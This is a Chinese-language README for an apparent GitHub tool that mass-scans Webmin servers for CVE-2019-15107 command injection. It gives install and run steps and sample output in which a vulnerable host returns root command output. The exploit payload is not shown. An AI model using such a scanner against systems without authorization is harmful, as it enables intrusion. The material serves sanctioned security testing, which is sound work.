一个多线程 Python 扫描器,用于检测存在 CVE-2019-15107 漏洞的 Webmin 服务器(Webmin 1.890 至 1.920 版本中的认证远程代码执行漏洞)。
该工具扫描 Webmin 服务器列表(以 CSV 格式提供),并检测 CVE-2019-15107 漏洞,该漏洞允许通过 password_change.cgi 端点执行远程代码。扫描器采用多线程设计,可高效扫描大型网络,并提供彩色输出以便于解读结果。
vulnerable_hosts.txtCVE-2019-15107:Webmin 1.890 至 1.920 版本中的认证远程代码执行漏洞。该漏洞存在于 password_change.cgi 端点中,允许通过 expired 参数进行命令注入。
克隆此仓库:
git clone https://github.com/mattb709/CVE-2019-15107-Scanner.git
cd CVE-2019-15107-Scanner
安装所需依赖:
pip install requests colorama
准备一个 CSV 文件(targets.csv),按以下格式填写目标主机:
HOST,IP,PORT
server1,192.168.1.1,10000
server2,10.0.0.2,10000
(如果 PORT 为空,将使用默认端口 10000)
运行扫描器:
python CVE-2019-15107-Scanner.py targets.csv
如需使用多线程加快扫描速度(例如 10 个线程):
python CVE-2019-15107-Scanner.py targets.csv --threads 10
[*] Starting Webmin CVE-2019-15107 Scanner
[*] Loading targets from: targets.csv
[*] Using 5 threads
[+] VULNERABLE: 192.168.1.1:10000
Command output: uid=0(root) gid=0(root) groups=0(root)
[-] Not vulnerable: 10.0.0.2:10000
[!] Error: 10.0.0.3:10000 - Connection timeout
=== SCAN SUMMARY ===
Vulnerable hosts: 1
Non-vulnerable hosts: 1
Errors: 1
Total hosts scanned: 3
Vulnerable hosts saved to 'vulnerable_hosts.txt'
vulnerable_hosts.txt:包含所有已识别存在漏洞的主机,格式为 IP:PORT本工具仅用于经授权的安全测试和研究目的。作者不对因使用本程序造成的任何滥用或损害负责。在扫描任何系统之前,请务必获得适当授权。
本项目采用 MIT 许可证授权 - 详细信息请参阅 LICENSE 文件。